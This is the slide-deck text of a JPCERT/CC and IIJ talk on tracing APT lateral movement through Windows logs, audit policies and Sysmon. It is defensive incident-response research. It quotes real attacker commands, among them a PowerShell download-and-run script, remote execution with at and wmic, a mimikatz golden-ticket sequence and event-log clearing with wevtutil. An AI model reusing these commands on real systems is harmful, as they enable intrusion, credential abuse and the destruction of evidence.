Pursue the Attackers – Identify and Investigate Lateral Movement Based on Behavior Pattern – by Shuhei Tomonaga, Keisuke-Muda

Pursue the Attackers
- Identify and Investigate Lateral
Movement Based on Behavior Pattern -
Shusei Tomonaga (JPCERT/CC)
Keisuke Muda (Internet Initiative Japan Inc.)

Copyright ©2017 JPCERT/CC All rights reserved.
Self-introduction
Analysis Center at JPCERT/CC
Malware analysis, Forensics investigation.
Written up posts on malware analysis and
technical findings on this blog and Github.
—http://blog.jpcert.or.jp/
—https://github.com/JPCERTCC/aa-tools
1
Shusei Tomonaga

Self-introduction
Internet Initiative Japan Inc. (IIJ)
Analyst, Security Operation Center,
Security Business Department,
Advanced Security Division
As a member of IIJ SOC, primarily working on:
—Analysis of logs sent from customers’ networks
—Research/Analysis of software vulnerabilities
—Enhancement of IIJ SOC service and the service
infrastructure
2
Keisuke Muda

Challenge of Incident Response
• Many hosts need to be investigated
for APT Incident Response
• Logs required for investigation are not
always recorded
• Difficult to detect Lateral Movement
3

Approach
For lateral movement, a limited set of tools are
used in many different incidents.
There are some common patterns in the lateral
movement methods.
4
If you know what logs are recorded with the lateral
movement tools, IR will be easier.

This Presentation Topics
5
１ Overview of APT Incident and
Lateral Movement
２ Tools Used by Attackers for
Lateral Movement
３ Tracing Attacks
４ Analysis of Tools Used by
Attackers

Copyright ©2017 JPCERT/CC All rights reserved.6
Lateral Movement
Lateral Movement
３ Tracing Attacks
Attackers

AD/
File Server
Target Network
1. Infection
2. Initial
investigation 3. Internal reconnaissance
4. Spread of infection
5. Sending stolen data
Overview of APT Incident and Lateral Movement
6. Delete evidence

Lateral Movement
Lateral Movement
３ Tracing Attacks
Attackers

Tools Used by Attackers at Lateral Movement
Why attackers use Windows commands and
legitimate tools?
They are not detected by antivirus software.
9
Attackers use not only attack tools
but also Windows commands and legitimate tools.

Research of Tools Used by Attackers
Investigating C&C servers and malware connections
in five operations.
APT10 (named by FireEye)
APT17 (named by FireEye)
Dragon OK (named by Palo Alto)
Blue Termite (named by Kaspersky)
Tick (named by Symantec)
10
Research Methods

Gstatus
11
Research Overview
C&C servers
Access Database

Emdivi
12
Research Overview
C&C servers
SQLite
Database
Executed commands

Research Overview
Malware connection
Type Encode RC4 key
Daserf(Delphi) LZNT1 + RC4 + Custom Base64 Constant
(Depends on the malware)
DATPER(old) LZNT1 + RC4 + Custom Base64 Constant
DATPER(new)
lzrw1kh + xor + RC4 + Custom
Base64
Constant
xxmm LZNT1 + RC4 + Custom Base64
Fixed(“1234”)
or
one-time key

Data Set
Total command
execution: 16,866
Total number of
infected host: 645
14
Research Overview

Data Set
Total command
execution: 16,866
Total number of
infected host: 645
15
Research Overview
Total Windows command execution: 14,268

Lateral Movement: Initial Investigation
The most used command is tasklist.
If the infected host was a virtual machine for
analysis, the attacker will escape soon.
16
• Collect information of the infected host
Initial investigation

Windows Command Used by Initial Investigation
Rank Command Count
1 tasklist 327
2 ver 182
3 ipconfig 145
4 net time 133
5 systeminfo 75
6 netstat 42
7 whoami 37
8 nbtstat 36
9 net start 35
10 set 29
11 qprocess 27
12 nslookup 11
17

Lateral Movement: Internal Reconnaissance
• Look for information saved in the compromised
machine and information on the network
Internal Reconnaissance
18
The most used command is dir.
—The attacker look around confidential data
stored in the infected host.
For searching the local network, net is used.

Windows Command Used for Internal Reconnaissance
Rank Command Count
1 dir 4466
2 ping 2372
3 net view 590
4 type 543
5 net use 541
6 echo 496
7 net user 442
8 net group 172
9 net localgroup 85
10 dsquery 81
11 net config 32
12 csvde 21
19

net Command
net view
— Obtain a list of connectable domain resources
net user
— Manage local/domain accounts
net localgroup
— Obtain a list of users belonging to local groups
net group
— Obtain a list of users belonging to certain domain groups
net use
— Access to resources
20

Why ping command is often executed?
Searching network hosts using ping
> echo @echo off >ee.bat
> echo for /l %%i in (1,1,255) do ping -n 1
10.0.0.%%i ^|find "TTL=" ^>^>rr.txt >>ee.bat
> type ee.bat
> ee.bat

Why echo command is executed?
Create script file using the echo command
> echo $p = New-Object System.Net.WebClient >xz.ps1
> echo $p.DownloadFile("http://xxxxxxxxxx.com/wp/0122.
dat","c:intellogs0122.exe") >>xz.ps1
> type xz.ps1
> powershell -ExecutionPolicy ByPass -File C:intellogs
xz.ps1

Windows Command Used for Internal Reconnaissance
Rank Command Count
13 net share 19
14 quser 18
15 net session 17
16 query 12
17 tracert 9
18 cscript 9
19 nltest 5
20 dumpel 5
21 tree 3
22 LogParser 2
23 net accounts 2
24 route 1
23

Search Logon Event logs
dumpel command
LogParser command
> dumpel.exe -f ac1.dat -l security -s 10.0.0.1 -d 10
> LogParser ""Select *From V:ServerSecurity.evtx Where
EventID=4624 AND TimeGenerated < '2017-04-28
23:59:59' AND TimeGenerated > '2017-04-28 00:00:00'""
-i:evt -o:csv > V:ServerSecurity.csv"

LogParser command 2
> LogParser -i:evt -o:csv select strings,timegenerated
from security where eventid=4624 and strings like ‘%min%'
and strings like '%winlogon.exe%' and (timegenerated
between TO_TIMESTAMP(‘2017-10-01’, 'yyyy-MM-dd’) and
TO_TIMESTAMP(‘2017-10-06', 'yyyy-MM-dd')) >c:
windowstemplog.csv

cscript command
> cscript eventquery.vbs /s 10.0.1.11 /l application /fi "id eq
22 "
eventquery.vbs
—Lists the events and event properties from one or
more event logs.
—Installed by default on Windows XP, Windows Server
2003. (Does not function on Windows 7 and later)

Lateral Movement: Spread of Infection
• Infect the machine with other malware or
try to access other hosts
Spread of infection
27
The most used command is at.
—“at” command is not supported on Windows 10,
Windows 8.1 etc.
—If "at" doesn't exist, schtasks is used.
Password dump tool is always used.

Windows Command Used for Spread of Infection
28
Rank Command Count
1 at 445
2 move 399
3 schtasks 379
4 copy 299
5 ren 151
6 reg 119
7 wmic 40
8 powershell 29
9 md 16
10 runas 7
11 sc 6
12 netsh 6

Remote Command Execute Used Windows Command
29
at command
> at [IP Address] 12:00 cmd /c
"C:windowstempmal.exe"
schtasks command
> schtasks /create /tn [Task Name] /tr C:1.bat /sc
onstart /ru System /s [IP Address]

Remote Command Execute Used Windows Command
30
wmic command
> wmic /node:[IP Address] /user:”[User Name]”
/password:”[PASSWORD]” process call create
“cmd /c c:WindowsSystem32net.exe user”

The Managed Object Format (MOF) compiler parses a file
containing MOF statements and adds the classes and
class instances defined in the file to the WMI repository.
31
Compile the MOF File
mofcomp command
> move %temp%mseinst.mof serverC$WINDOWS
system32wbemsvmon.mof
> mofcomp -N:rootdefault C:WINDOWSsystem32
wbemsvmon.mof >c:mofinst.txt
> mofcomp -AUTORECOVER C:WINDOWSsystem32
wbemsvmon.mof >>c:mofinst.txt

Lateral Movement: Delete Evidence
• Delete files used by the attacker and logs
Delete evidence
32
The most used command is del.
For deleting the event log, wevtutil is used.

Windows Command Used for Delete Evidence
Rank Command Count
1 del 844
2 taskkill 80
3 klist 73
4 wevtutil 23
5 rd 15
33

wevtutil command
Delete event logs
> wevtutil cl security
> wevtutil qe security /f:text /q:""*[System[EventID
=4624 or EventID=4769 or EventID=4672 or
EventID=4768]] and *[System[TimeCreated[@
SystemTime>='2017-07-10T00:00:00.000']]]""
>c:windowssystem32log.txt
Search logon event logs

wevtutil command
> wevtutil qe system /count:20 /rd:true /f:text /q:
""Event[System[(EventID=6005)]]"" |find ""Date"" >
inf.txt
Search start-up event logs

An attacker uses Pass-the-ticket when spreading
infection to other hosts
—Pass-the-hash is rarely used
Pass-the-ticket
—Issues an unauthorized ticket that grants access
without additional authentication
—Golden ticket
Use TGT (Ticket-Granting Tickets)
—Silver ticket
Use ST (Service Ticket)
36
Delete Evidence of Pass-the-Ticket

Delete Evidence of Pass-the-Ticket
klist command
> klist purge

Example of Command Execution Flow
Example (Tick)
> cd intellogs
> whoami
> klist
> net use
> klist purge
> IntelGFX.exe "kerberos::golden /user:administrator /domain:[Domain]
/sid:[SID] /krbtgt:[RC4 Key] /group:502 /ticket:0422.tck" exit
> IntelGFX.exe "kerberos::ptt 0422.tck" exit
> ping -n 1 10.1.44.16
> ping -n 1 10.1.2.16
> net use 10.1.2.16
> dir 100.1.2.16c$users
Golden Ticket with Mimikatz
Initial investigation
Internal reconnaissance

> copy bb.bat 10.1.2.16c$windowssystem32
> net time 10.1.2.16
> at 10.1.2.16 12:27 bb.bat
> dir 10.1.2.16c$windowssystem32inf.txt
> move 10.1.2.16c$windowssystem32inf.txt .
> del 10.1.2.16c$windowssystem32bb.bat
> copy zt.exe 10.1.2.16c$windowssystem32mscfg.exe
> net time 10.1.2.16
> at 10.1.2.16 12:33 mscfg.exe
> dir 10.1.2.16c$windowssystem32mscfg.exe
> del 10.1.2.16c$windowssystem32inf.txt
> del 10.1.2.16c$windowstasksat*.job
> net use 10.1.2.16 /del
> dir
> del zt.exe inf.txt bb.bat
> dir
> net use
Spread of infection
Delete evidence

Lateral Movement
Lateral Movement
３ Tracing Attacks
Attackers

What Do We Want to Know About the Attacks…?
usedHosts Accounts/Privileges
executedTools
being accessedFiles/Intelligences
Network traffics
attackers coming backPossibility of

executedTools
Network traffics
Find in Logon History
Find in Execution History
Find in Access and Execution Histories

Following records are taken by default on Windows:
— Client OS
Successful/Failed Logon
Successful Logoff
Successful Policy Modification ... that’s about it
— Server OS
Successful Authentication in addition to the above
Some of the “Logon Histories” could be traced from the
default logs.
There may not be enough record to prove “Execution
History” and “Access History”.
43
What Do We Want vs. What Can Be Found

Default configuration is not enough.
—Methods to cover the missing pieces are needed.
—There are not so many documents that summarize
methods and significant points for identifying threats.
Some of the entities are not recorded by default,
but it is possible to configure hosts to keep those
records.
—We do need to think about which entities we should
cover to track the attacks.
44
Preparing For Investigation

Tools and commands that were used in actual
attacks were analyzed.
—49 different tools that were frequently used in
attack behaviors were selected.
Approx. 1/3 were legitimate Windows tools.
—Each of them was tested on a virtual network,
and their execution “logs” were recorded.
45
Detecting Lateral Movement through Tracking Event Logs

Tools and commands that were used in actual
attacks were analyzed.
—49 different tools that were frequently used in
attack behaviors were selected.
Approx. 1/3 were legitimate Windows tools.
—Each of them was tested on a virtual network,
and their execution “logs” were recorded.
In most cases, additional tweaks were
necessary to obtain enough records.
46
Detecting Lateral Movement through Tracking Event Logs

Research report is
available on
JPCERT/CC website.
— https://www.jpcert.or.jp/english/
pub/sr/ir_research.html
— English/Japanese
First published in 2016
Updated version 2017
available in Japanese
— English version
coming in December
47
Research Report

The report shows some important aspects for tracing each tool.
48
Research Report
Report screenshot in Japanese; English version coming soon.

Windows Event Logs
—Default and additional logs
Registry
Cache for performance improvements
File System Activities
File/Folder Access Histories
Network Traffic
49
Elements Researched

Event Logs were the most useful among the
entities.
50
Research Results
Audit Policy Sysmon Application
Logs

entities.
There were some other useful information.
51
Research Results
Logs
USN
Journals
Packet
Capture

entities.
There were some other useful information.
Research Results
Logs
This session
primarily
focuses here.
USN
Journals
Packet
Capture

Lateral Movement
Lateral Movement
３ Tracing Attacks
Attackers

Additional settings are needed to record tools
execution.
Additional settings makes difference in amount
of evidences that may be obtained.
—Without those additional settings, evidences
obtained from the compromised hosts may not
be enough.
54
Analysis of Tools Used by Attackers

Is a PowerShell script published on GitHub.
Obtains plain text passwords stored on Group
Policy settings.
—Passwords can be stored when an update for
MS14-025 is not applied.
The following slides assume execution of the
PowerShell scripts.
55
Example: Get-GPPPassword.ps1

An example case of attack procedures.
56
Tracing Execution Histories
Install remote access and/or other tools.
(Out of scope of this session)
Necessary information, such as AD domain names
and domain controller FQDN, are obtained.
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Permit PowerShell script execution
(which is disabled by default).
Download the script to execute.
Execute the downloaded script.
Remove evidences of compromises.

executedTools
Network traffics
Find in Logon History
Find in Execution History
Find in Access and Execution Histories
Looks similar
to an ordinal
Logon
PowerShell
was used in
some ways,
but not sure
about what
has
happened

Investigate compromised accounts and
executed commands using Audit Policies
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
logs
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
58

6. Remove Evidences
logs
59

Options available on
Windows by default.
—One of the places to get
started.
With default settings, not
many events are actually
audited.
—Resulting in lack of
evidences for tracing
the attacks.
60
Audit Policies

A software that is a part of Windows Sysinternals.
— https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
The software is publicly available on the webpage above.
61
Sysmon

A software that is a part of Windows Sysinternals.
— https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
The software is publicly available on the webpage above.
Information logged are shown below
(based on version 6.10, released on May 2017)
62
Sysmon
Process created
/terminated
Change of file
creation time
Network
connection
Driver loaded
Image loaded
Thread created in
another process
Read disk using
“.” denotation
Process
accessed
File creation
Registry events
File stream
events
Pipe events
WMI events

If logs are preserved:
Evidences that cannot be recovered afterwards
are recorded.
If there is a case where the tool creates a temporary file:
63
Advantages of Log Analysis
The file may be removed from the
disk and cannot be recovered.
When searching on the disk...
“The file was created” in some
ways, but not sure about exactly
what was in the file
When running forensics...
Applications and
command lines
used for creating files
may be recovered.
From logs...

Not a smart idea
— “We have no idea about which logs we should keep.
Simply just keep every single log”
If “take everything and filter out later” is the policy, it is okay to keep
everything.
By default, old logs are overwritten when
a log reaches its maximum size.
— Domain Controller: 128MB
— Others: 20MB
Important evidences might get buried without appropriate configurations.
— Logs for several weeks are stored without additional settings, but
does not contain enough evidences
— Logs may be overwritten within few hours with improperly configured
additional settings
64
Appropriate Configurations

Events that were “useful”:
65
Useful Events (“Security” Events)
4611 4624 4648
4776 4778
Logon
4634 4779
Logoff
Process Executed
4688
Process Terminated
4689
Filtering Platform
5156
Account Management
4720 4722 4724
4726 4728 4737
4738
4670 4904 4905
4946 4947
Policy Change
Use of Privileges
4672 4673 4674
4703 4768 4769
4771
File Sharing
5140 5142
5144 5145
Handles
4656 4658 4659
4660 4661 4663
4690
VSS
8222

The following events are recorded by default and were useful:
66
Useful Events (Windows Standard Events)
7036 7040 7045
System
102 103 105 216
300 302 2001
2003 2005 2006
Application
Microsoft-Windows
-Application-Experience
/Program-Telemetry
Microsoft-Windows
-Bits-Client
/Operational
Microsoft-Windows
-DeviceSetupManager
/Admin
Microsoft-Windows
-Kernel-PnP
/Configuration
Microsoft-Windows
-TerminalServices
-LocalSessionManager
/Operational
Microsoft-Windows
-TerminalServices
-RemoteConnection
Manager/Operational
Microsoft-Windows
-TerminalServices
-RDPClient/Operational
Microsoft-Windows
-Kernel-PnPConfig
/Configuration
Microsoft-Windows
-PowerShell
/Operational
Microsoft-Windows
-WinRM/Operational
Microsoft-Windows
-Windows-WMI-Activity
/Operational
104
Logs Cleared

Events that were “useful”:
67
Useful Events (Sysmon Events)
Process Created
1
Use with “Security” audits
Process Terminated
5
File Creation
Time Changed
2
Network Connection
3
CreateRemoteThread
8
RawAccessRead
9
Process Accessed
10
Registry Events
12, 13

Some properties might be common in both logs
—Sysmon logs tend to have more useful details.
—Some properties, such as “Token Elevation
Types” appears only on Audit logs.
68
Audit Policies and Sysmon (1)
Audit Sysmon

6. Remove Evidences
logs
69
Done for
Registry
Done
“PowerShell
was used” in
some way

By default, execution of PowerShell is logged,
but not sure about what has happened on the
PowerShell session.
70
PowerShell Logs

With group policies, it is possible to configure
Windows to record PowerShell logs on:
—Windows 10, and
—Previous Windows versions with required
modules installed
71
PowerShell Logs

The entire script will be recorded in Event Logs.
Command histories are saved in a separate file.
72
PowerShell Logs
Script Command History
(%AppData%MicrosoftWindows
PowerShellPSReadline)

6. Remove Evidences
logs
73
Done
Done
Done

If there are network devices...
— Logs from firewalls, web proxies, IDS/IPS, and so on are useful.
74
Investigating Network Activities

If there are network devices...
— Logs from firewalls, web proxies, IDS/IPS, and so on are useful.
If there are no network devices that can produce useful logs…
75
Investigating Network Activities
Sysmon Event 3
(“Network connection
detected”)
Access to Shared
Folders (Logged on
the Domain Controller)
Windows Filtering
Platform
(Windows Firewall)

Similar to process audits, network connections are logged in both
audit and Sysmon logs
76
Audit Policies and Sysmon (2)
Audit Sysmon

History of file downloads may be found on:
—PowerShell commands
Invoke-WebRequest,
System.Net.WebClient.DownloadFile, etc…
Can be checked from PowerShell logs
—Files related to web browsers
Download history
Temporary Internet Files
77
File Downloads
It is possible to check them using Event Logs.

6. Remove Evidences
logs
78
Done
Done
Done
Done

File operations can be
traced from the Audit logs.
If the attacker creates a RAR or a ZIP file to
create a single file to upload obtained files to
his/her site...
—The archive file is created temporarily, and then
removed from the disk so it would not be found.
79
Tracking File Deletion

Event Logs may be cleared
easily if the compromised
account has administrative rights.
If logs are logged on a file, simply removing the log
file will clear an evidence.
80
Clear Logs
Need to consider a case where
logs were cleared by attackers.

Logs remaining on the hosts may be cleared
when an attacker successfully logs onto them.
Real-time log transfer to other hosts help
administrators to trace events even when the logs
were cleared from hosts locally.
—Event subscription
—Send using protocols such as Syslog
—Back up log files periodically
81
To Trace Attacks Even When Logs Were Cleared

6. Remove Evidences
logs
82
Done
Done
Done
Done
Done

It is necessary to tune up log sizes appropriately.
—Otherwise, the precious evidences may get
buried with other “garbage”.
When attackers clear the logs stored on the
compromised hosts, it becomes difficult to trace
attacks.
—It is important to think about gathering logs on
other hosts securely.
83
“Cons” of the Method

Execution histories of tools may be traced.
—They cannot be traced by default settings.
—Some “valuable” logs are recorded by simply
modifying Windows settings and installing the
free software
84
“Pros” of the Method

This research primarily used “Windows
standard features + Sysmon”.
Adding other elements would improve analysis.
—Monitoring networks
—Monitoring endpoints etc...
85
To Obtain Better Logs

Conclusion
Typically, limited set of tools and commands are
used for Lateral Movement.
Many attack tools can be detected with audit
policy and Sysmon.
Our report would be helpful if you are
investigating APT incidents.
86

Thank you
Q&A
https://www.jpcert.or.jp/english/pub/sr/ir_research.html

Pursue the Attackers – Identify and Investigate Lateral Movement Based on Behavior Pattern – by Shuhei Tomonaga, Keisuke-Muda

More Related Content

Pursue the Attackers – Identify and Investigate Lateral Movement Based on Behavior Pattern – by Shuhei Tomonaga, Keisuke-Muda